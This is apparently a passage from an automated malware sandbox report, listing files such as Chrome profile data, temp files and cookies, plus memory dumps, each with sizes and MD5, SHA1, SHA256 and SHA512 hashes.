SHA17c3a52536eff14d9f7e895ef0508a0d81aaeaa66
SHA256f66c0cccbdddf57ccc34ab0c926552f9987862c735c222ccf27762aeecd82b26
SHA512f18cc6218b41f9e3856294fc47ea010f254532dcb1806b896c0dcb9749c598578155f000e7539414288ba6fb5dae835930492668e8982207c0c667211fb01dbe
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
526B
MD5e6baaac19e539c5efa82e4969bb03f8f
SHA17e367f74da151872de99a9fb11c73ea8ba700682
SHA2569e57a0e638405e7a886b1436827b4949bde4cdc0f17698da3bce4d47b9d76e53
SHA512fdccdd59f9d7200a42724f79e21186f3cda03b1ff1c3f7b1299facadbbaa11cac78071be936eb7a2f880c33ab874817ee5ed7f93a7123457f3a806e82a2a1dbf
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
526B
MD5b90449e8ef0e6ccaabb6a9461589117e
SHA13d55585bc1dc9e7ae3b054db8ec4148a66e19b46
SHA2561c7d7a4660cec04cb817dadbca47da8aa24311ab8260ee083952d00b94130da8
SHA5123534eac67dae62e48ddc0cf72773af931bd6fc96b89461d236adab191c8900a5536730e65e111e6adfbf86eba91c41ec3186260f873d5bbcb789c24948b52080
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
524B
MD5c8ef35053c8bbf94825fb7a9c07a5e1a
SHA1b31c391d69ed6a1b2e3e8d72a1900f672eab8838
SHA256b219407f42ed3a29b0aa4a56b65f0cdaef83f6bfb719187671125379fd7f7817
SHA5122df723927017ebd68dcde9992ffab129b45c525ea094840b9e071d0b667beff949f63bd52207cf1fdd30e509831b1afdbb1260dd0d8e65b78f0b5c2bde73dfa1
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
526B
MD53bae789d53ecdf0f2bd86e50a6de8c39
SHA1dc776e265ec7a16876a35fdc63de567e2549d720
SHA256e9f92a1ea57acb88ca9be33f61f2db3c710210a5ab4d8c190664f3ae044f4a4a
SHA51214b7fd68fcec61b71a6e9e389df7381101c171532f19a89e9a91ff45a7526dd6ffcba5624744006bdbe71e998a8e8785ed8bb4bfe345cedaa42fa7fc48584f28
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
524B
MD514e57e4c2410a405be1a6cfc0a676b76
SHA188730280d71f42c87fa2c8839ea733634a2d4ddb
SHA256a049d8c28dc8650daea43312a5c20113ffc300bbb49a56838ab149f1d6695509
SHA512aafe51e7cb59ec67bba94930348b85efbd87b3b5e26d610ea3108d43ec83a78ab6926987d9b2e97e88f71d7732c9e369b3e047be8036a3bd36a6fa49b2a3162c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
524B
MD5a7ff2d6063f14f4a43d7f522f0815da3
SHA1dd7497331e046b00385fcd43a952dfd17ccb812d
SHA256d97dce28c42cec145c0e7982f1b1f2fcce5ec92e2bd2f31b20971214432b7487
SHA512e3ccdcae7122a1367c4665fb7527e4fc4a79503d3f20687f8f5135a41895e85d1a1045842863d38bd2f7fd8038d042b6d4ece461affac5891ef8d5550042282a
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
522B
MD5ea476e85f0443df460059c0439d063c8
SHA1cb14d4467d990b81b7a4d2be5239e61664c00b8e
SHA256162a4835bca789ed620d7399e1402cdf10f89c3400e81a206112aacb61093864
SHA512c59ea67917df2eed221dc64597140504d8a3c658f5a46287216a1528d8ba3632066b2d5e6dd2b49ee587f5d7b3aca5c695e627f393768d2c631d7a61a60d222c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
526B
MD59234cbfa25a248b33d3b0b4e80a9876f
SHA17168394388ad830441d0b2ebe2d5ca1374f1aa1e
SHA2561df1a2e8057f758cbf7e0d327a875b5516e408b5bd52cd375359b7e7f107617f
SHA5128c119584200f001cc870e6974e40caea2fa6182ef8e6dad34fefa6693e3bb5162aa8c3c6a530baca8f0f344d76f5e5cbd2d975c4a38a420b081c0b9889c27298
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
526B
MD5ad10c8e5259a776d167b7620de668ba8
SHA1a14c9d8f755d21b3052e67685b533c57327efcf2
SHA256a93e7529084feac23147e3672c0147c40f75471ef043881e477264ad0133ab2f
SHA512fcc6096ec33a01055eaf931802e2b6d70e63f796c6f730f19ed0e8ba3efe4d69f04677021414deecf700b384bc8a8c7232e2e25c7a6dde5e8a0bca68848f8760
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
524B
MD5bc025cf6d691bc59f2679d9400b62901
SHA1d63c0217db4208d437784237cda0f1d9efcdfba8
SHA2567c4715f756426d97166188b05e45a7e411877bc8ff40991f8ef6e4fd4e381728
SHA51218525beba4d1431d1fc8882578aab548e34c10d73bd44ed3fc69a42471884ee001ffb0205f7d200f282558374038571c04856dbe9597339a78271e5ae9efd1cf
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
526B
MD5e1d8957d9cbac95b9158a46af1d1067d
SHA1ad853c879cce1fc71861362bc19cdf1b4f83d2d4
SHA2563e846b9e974e0ccb4998ba1de99b814b2765ed042a405dbde3fb70d1868f8b07
SHA51246511be4d19dae0d678c53ca4685bf1916435427896998a48d6d66fe134af581a071a851b3207d0a18bd123188ac8026e9fd6a8852c06db99602d070c71379fa
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD50a749e20f0e479a3703422c246ed3d78
SHA1ce36b35cc8f413519b9e01d2ead273bddaad0bf5
SHA2562db8adb0ec47b9e61e99cca02cf84d6022f523aa4d1bfa6328fed065f0284e5e
SHA512b559650899037ca5fd682985235ec6b40464c066101528c03b6914d7480f2eb3345649c56f979089ee3c75dea389d31bc3b27bc1d6a1c15a0305802766a0a330
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD594374bd36e2ca183e0c2caf3adcc70f7
SHA123608aba8b7f2066fa175315c2a28822e5593c98
SHA2567e8e6dd8ee2d79732597314a3fddb71f0383e88b3fd487d91082c5fc3517baeb
SHA51243efcd29d5a057113aa3abf16ca26831e4fe6babd0141e07ab52155939128e0d0ed5ca0e9a368df7324b0cfd55f34f3fd0aa417729c8d640defeb9a2f4650933
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD5ed76e569a3fe39166fe3d3eb2400590c
SHA1dc90d403398d16d0e59608d971b58b2d218be488
SHA2563ea61c672a9e6cd86495143b4c7fb7a4f99a1785204f2097f73d2179103abd5b
SHA5128ea8156ed7879372b0e72b9ae68490cfff36d283bf54e55af6468e342f1abdc0a19d66d236a8a4e3fb1f5b1dbeffa4b68e6aa6d8c8d00bd6fedbd6a6bcaf469a
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
5KB
MD51d196525b17c098c1f2f8f1ac8d03961
SHA18ad5eec3d08ab385dbbe237d16b64a8794f67ad4
SHA2567eaf89391aace4e3ded05a765527e507c800871fc90fdb22c1bdb167935e5526
SHA5129d1b365cad3ccc0f547626b562cc494e6e7e95a12adf5df9ceb762cb2c0e79b2449879e7a24489aa30c796942d3c6ac3fea01c4457047997a1553a01a48cf075
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD52e6b67bf01e2188f54c7fd687dc44737
SHA16986ab6406ddb614828055dfc238ad63e3836245
SHA256bcbe4c42056499b6754347739ced20fda9cad263030a72b9dd8a2c5c6b875be8
SHA51272cbfa5b37e811842d18346c7d3dd6f7e89045a1d2593332f08616bcd2b0621f7af4c3fced6482ec299551d37dd003969fd52036608bed9354b5eafaf4a936e1
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD5b365412a54a90a29eb5d3cf00fc96fa9
SHA1018059284ee3999bd3b36f1f782c7f7a1c5ad15a
SHA25669b52b74e0c0bb585dca3c257d35edc5340444febe072cbf4045053371547ed2
SHA512106069b2e03dd6af12466dafc151a5c4afd98c9d71fd08c02c8d8083f159d3a7d542ab062a81b49f95f0ab64d6de555d62a6d674c084422f446817b1747053a1
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD556f35609a7d86609eec2413d856aa49f
SHA122dddd31188998b8dc4a15e75dc3899fa170d4cb
SHA256c41b011fcccade7e9909de643bcb0055d7c042a2e9243d57ffd88a5f62e5cad1
SHA512c5e54b520533a89214df1905e628bccdf7a02ef9c0c3df4cab0b4f12d918d03aca726bebe42438510489b10bb0fcca9761c1520e6e883318bcc6750d48c682cc
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD5bbeb5540e229d7ee3bebb30913fccc13
SHA14c4cc8850b08e317934bbe2a4b29414677fa7f3b
SHA256720784a2ca8e62bc6127b8bdd2cd1c2ba820db94a7df8c6da4ad89c3072dd387
SHA51259b3098aea87d08cfed0b0cfb03013bcd4100febe6c5bc703efaa7891aee5f1d0ae6b24a14eec64d16e75b30a4ae41c40ef6bc07af6a4dac1fd8f678b5c96458
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD5ac2731763eb9faf7ea3342bfecbb1c2c
SHA1ea13a0df03600243c57bcb6d6263beb5c1aa9d66
SHA256050c26aaf32a6410b4e1dd98c350627be7b7754ed343ff1db48c9bd0b84d7244
SHA51255dcc76416d149a824b79dc936a4b55571640040f77962880d6403a226d6080b9e8cc35d36c7db3b434df1b10fd720b2f2091cdb4332e19ddff680dfd082795f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD5294ab9b464fa41ceda5a36c17b5d91bb
SHA1abb00d54bc29d205828d846da99da58f9fcbae0e
SHA2566f1768ccc9acf649b1d4d5ddf4e48eb32ed0648a7106a24d68e76cec0fdfd7e4
SHA5129e43d4077d0ae521128b13c1370130cf57404ed7c1b288774882e49b2a506a80a0e56560683eb1d1f3e121159b0d56d4ff426c63a5685355284406222e9837f4
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD5831c032ecb6c4597495bde18a7051dd5
SHA14daeef6a083f8889d86d5f33a69d1380eb963f1d
SHA2567e2942ce1faa1e5c5857640878148109b12df2efa628d340ff83e86d25a4d44d
SHA512bb608aa6807daf2a9de199a0f4b80060ef5ae269348717c75b33f42668be78f6c27ce80997518beaf2ee2439d64d88be5e159ec27d128c189a89de53bef89dfe
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD5ad7d407ba2cc11862505847cfffb3fb9
SHA144da29d19157e978eeacc4dd482bb3a6d3cba20d
SHA2564904e6d803ffddc8064c2b48294aef4b08ce873e531f0f9e9a2c67b0a82531c9
SHA51254e49705d3176fb17c52fe2cde0bf34bec04b7d81771a6be01d2b0e2b4585c5da62f555429d5076f171475cfe11665c85a3b8bc0567a96821c929d38ca2fed8d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
6KB
MD5befb3412b618926f2bc984550174bdcf
SHA1483e494f8421e4370eeb09896dffffe713ef3dfd
SHA256fd42c20e21d5034560fbf1ab5fabb46748c4c6013d1791d60376ca2abd10202c
SHA5124964695c28b39d635f7d74ec6e320f8d74b862aed1dc2dba3e96f1d1059816cfaf8d9afa126b6792008c5659f227a8feb3695cc6d08e9393add2fc6f8e852e38
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmpFilesize
16B
MD518e723571b00fb1694a3bad6c78e4054
SHA1afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA2568af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA51243bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
282KB
MD5c8faf1e57c0abd10b0623a0c0881c811
SHA1097e82560b5a35d1ed2b8101426c3a29bb4a6fae
SHA25622cc30148c2edbad11340ebfcdd2513858fb92a6a47a651074b0b35cc96f0d09
SHA512074754558c5e9527d7311a6339d8ec6aa60492caa990b2d2029ca58546b1efa539305c29aa6d3b601b25c5aef6b547d441ed6173269af04aec0d44f7528e4a6a
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
282KB
MD5b89161acc5af4938f090b5fda55fd13e
SHA1828b2da771afb4b56ac5e83443217d60b2937a31
SHA256ffb705a82cc19ef529cfbb20b6298093f8ea32f1ffb881aa4409a320e4590429
SHA512c1b94ad5ed594fb8825c06e9ea2bdbaf1c90cd09e3308c6ed8672cc4ae459b6be254160d3e67030d4ff7ee0079c6622ba77372d4e5f8677b89d852fef20a463f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
282KB
MD599582807b52cd4061181a8c52b25a0f5
SHA162304b987f93c2c46b033ad8be73a04407ab397d
SHA256ca1b76900e4810acaf4786875a52ad81ee25d0d363780addfe66875f2f8febb9
SHA5124e12e5d48c6bc4674d1c7e22a9b472386d61a9848224525a640eab1cac82471131992867c26a67b8b6557a4e3d3e1d306cd91ca88cefd7262c31191520e9afc7
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info CacheFilesize
81KB
MD581ce84830d0bff759d1dde303130c97e
SHA123d422d26b92222374c5bc8043cbd460be740fa9
SHA2562c7681b3cf3c85564ff594de88d4075a55dbd1e857d3253cea1fce8ac1363e69
SHA512cbcb1659d101d2a20ca94dc76c135f77d429584dfb27b036f190aff6c12390b258bccf70d40a1f6e16cd3dde349f930a31e57f2841068e3c1878dd7c5cd3f2a6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info CacheFilesize
74KB
MD5722618a15f25ac92c7d396efdad7f0a4
SHA1659675bb74d8b3e245ea55ca7b52fb2ac2ef6c80
SHA256bc98a735de6de042f6662b3c0c7399f17a55ada7ff6695df596fa7e04687222c
SHA512cd2ef529447c8a7a9ef0689a45eda675f71cd5beeb7ac3534b978c381564df771c799da19a8eb9d27a27f887ba4434412c337d2332fac1f529d91ef28a0fbee9
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\cd27069c-c525-4897-807f-9be4901a2434.tmpFilesize
282KB
MD55c6d5a2a0e356965ac924d08f1197fdf
SHA13b6a450777aed1a1e5b3d0553fd16e94e297c8a3
SHA256dc466e5e276827134a9b9d5844d80896c263bdd87c2b5e508e872c0c1c662f06
SHA512c973d55af40833b0d12148a8b138b2ddaa725221afe79f18bd10d9a753b002ef075abcb9ebb30949dd0979684b14041524749bb3a7fc263c0f2e45c3e4bfa4db
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\qsml[1].xmlFilesize
568B
MD5456ae3018b9dbf412f56b1f7174c40d6
SHA14e5d95ab9ca96c5ba853ec659064bc60b623fc4b
SHA256aea4339836d9e5cfc4a252324af6bc7f7c91fd26eff9ba2610ff62d63911e54a
SHA512fb1fff027fd7d608e2f62fe6d222b810834f72e1eac99c1db44a1a6502ab09569baef3d144fd8a507aa0eccf375a239192a0f2d77b7122fc58c9517f5da365da
-
C:\Users\Admin\AppData\Local\Temp\Cab6431.tmpFilesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
C:\Users\Admin\AppData\Local\Temp\Tar6533.tmpFilesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Local\Temp\~DFF3F0442AC16B4886.TMPFilesize
16KB
MD58810f66d7b896336f941154a6af00938
SHA1e83336a4655c0fd2cb06efef4ec2f1fee350ec22
SHA256376360c3cea14a35314ebda0812969fdcffca0888bfc6badbe89dd62a26fc300
SHA512470d7cbec552ce0c9dbf4064fc05244c48bd1d4e7559b69444ea1e12460d5eafe43c8731134372483d8767b51e3a6ca9a955209e3f05f99528a9019dfb1c9bcd
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\PNTCVG4K.txtFilesize
509B
MD574f5fdc0e9b654f19a9938dfbe76f43e
SHA1bc851411b62b2602c4408d99bd04453d8af3c441
SHA256f6070497c5949c09e1515f058bbb945a62b2f45be6188b2cd31dae355859a117
SHA512a7b2470984fc7454c22e5787fa0dbb8105efc6b67905f0efbce1772b01035288ec7c3eaf234bcf04eaf4cc5485f096bb5a966b8cebbbd15e93c94c456acdb418
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5f7faaf4a28ace5a965b09387371a6e24
SHA1ae7ab32bfe39a2f0c6a25e708f507f6adb5f5409
SHA25680acdb033172e206a7112bb30ccd213eef3fd91bdc398d8df03a237798da9243
SHA51269e1676845cf9980a8d766d1da8c260cf8c4697cd3651cb0cfad8bea4db6a849b69777561dd83924c29d54a43340aefc4b5ec79e3b89a312f408a8489c3911d0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5W1REM5DX3VR3LDIXGP9.tempFilesize
7KB
MD5042b6f9b9601227b8668b0aac15419ee
SHA137d9689abf95cc1ccff6683761bdadc7fd4fee98
SHA256cc8c5f27d1a6832a8c732aa028e5296a779f15774d5315d23eb02d4f23d8bb7e
SHA512f082ebd74ce0482eec42e50aaec65771e60a0a7192b8ba4d49cceab6cce13f9e4085c1338134bfb224451e079a19af17f6b98b8249cd1e56bbb1bd1c95cda3ff
-
\??\pipe\crashpad_1312_GTITFZETVRDKJTBSMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/824-1355-0x0000000001380000-0x0000000001388000-memory.dmpFilesize
32KB
-
memory/868-1342-0x0000000001EF0000-0x0000000001EF8000-memory.dmpFilesize
32KB
-
memory/868-1341-0x000000001B710000-0x000000001B9F2000-memory.dmpFilesize
2.9MB
-
memory/1088-1335-0x0000000000330000-0x0000000000338000-memory.dmpFilesize
32KB
-
memory/2156-0-0x000007FEF5BE3000-0x000007FEF5BE4000-memory.dmpFilesize
4KB
-
memory/2156-1-0x00000000000F0000-0x00000000000F8000-memory.dmpFilesize
32KB
-
memory/2452-1349-0x00000000013A0000-0x00000000013A8000-memory.dmpFilesize
32KB
-
memory/2520-1343-0x0000000000AF0000-0x0000000000AF8000-memory.dmpFilesize
32KB
-
memory/2572-9-0x0000000002960000-0x00000000029E0000-memory.dmpFilesize
512KB
-
memory/2572-6-0x0000000002960000-0x00000000029E0000-memory.dmpFilesize
512KB
-
memory/2572-7-0x000000001B630000-0x000000001B912000-memory.dmpFilesize
2.9MB
-
memory/2572-8-0x0000000002810000-0x0000000002818000-memory.dmpFilesize
32KB